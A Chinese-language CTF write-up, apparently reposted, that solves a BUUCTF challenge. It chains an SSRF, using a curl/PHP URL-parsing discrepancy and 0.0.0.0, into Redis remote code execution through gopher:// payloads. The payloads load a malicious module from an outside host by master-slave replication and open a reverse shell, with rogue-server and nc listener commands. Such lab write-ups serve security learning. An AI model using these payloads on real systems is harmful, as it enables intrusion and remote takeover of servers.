首頁 > 玄武

玄武

互聯網 2021-05-08 09:37:45

在BUU做的復現

https://blog.csdn.net/qq_39293438/article/details/84899550這裡面關於 curl 的利用提到了,當處理這個地址時 在這裡插入圖片描述 curl 和 php_url_parse 處理后最終的目標不一樣 在這裡插入圖片描述 當 php_url_parse 認為 google.com 為目標的同時,curl 認為 evil.com:80 是目標。 也可以使用 DNS 重綁定(DNS rebinding)淺談DNS重綁定漏洞 我用的是 ?url=http://0.0.0.0/hint.php //0.0.0.0 代表本機 ipv4 的所有地址 在這裡插入圖片描述 得到redis psss 用主從複製打 目錄為有許可權的/tmp

主從複製,是指將一台Redis伺服器的數據,複製到其他的Redis伺服器。前者稱為主節點(master),後者稱為從節點(slave);數據的複製是單向的,只能由主節點到從節點。redis的持久化使得機器即使重啟數據也不會丟失,因為redis伺服器重啟後會把硬碟上的文件重新恢復到內存中,但是如果硬碟的數據被刪除的話數據就無法恢復了,如果通過主從複製就能解決這個問題,主redis的數據和從redis上的數據保持實時同步,當主redis寫入數據是就會通過主從複製複製到其它從redis。

在這裡插入圖片描述 在這裡插入圖片描述

gopher://0.0.0.0:6379/_auth rootconfig set dir /tmp/quit//這裡要二次url編碼gopher://0.0.0.0:6379/_auth%2520root%250aconfig%2520set%2520dir%2520%252ftmp%252f%250aquitgopher://0.0.0.0:6379/_auth rootconfig set dbfilename exp.soslaveof 174.1.160.222 6666quitgopher://0.0.0.0:6379/_auth rootmodule load /tmp/exp.sosystem.rev 174.1.160.222 6663quit

用rogue-server.py架起rogue 伺服器,另外再監聽6663埠。也就是說6666埠監聽用來主從複製傳輸exp.so ,6663埠接收反彈shell。

rogue-server.py 來自https://github.com/xmsec/redis-ssrf (用這裡的ssrf-redis.py是可以直接生成執行命令的payload,但buu的這我cat /flag一直打不出flag,whoami,pwd是有結果回顯,很奇怪不知道啥原因) exp.so 來自https://github.com/n0b0dyCN/redis-rogue-server

redis連接過後就這樣,記得寫個死循環跑rogue-server.py 不然一連上就自動斷開連接。可能導致exp.so都沒傳完就中斷了。

while [ "1" = "1" ]do python rogue-server.pydone

在這裡插入圖片描述 再開個窗口nc -lvvp 6663監聽就行 在這裡插入圖片描述 在這裡插入圖片描述

參考:

http://phoebe233.cn/index.php/archives/43/#images-22 https://guokeya.github.io/post/UwrwldTcP/ https://www.secpulse.com/archives/132215.html

免責聲明:非本網註明原創的信息,皆為程序自動獲取互聯網,目的在於傳遞更多信息,並不代表本網贊同其觀點和對其真實性負責;如此頁面有侵犯到您的權益,請給站長發送郵件,並提供相關證明(版權證明、身份證正反面、侵權鏈接),站長將在收到郵件12小時內刪除。

相關閱讀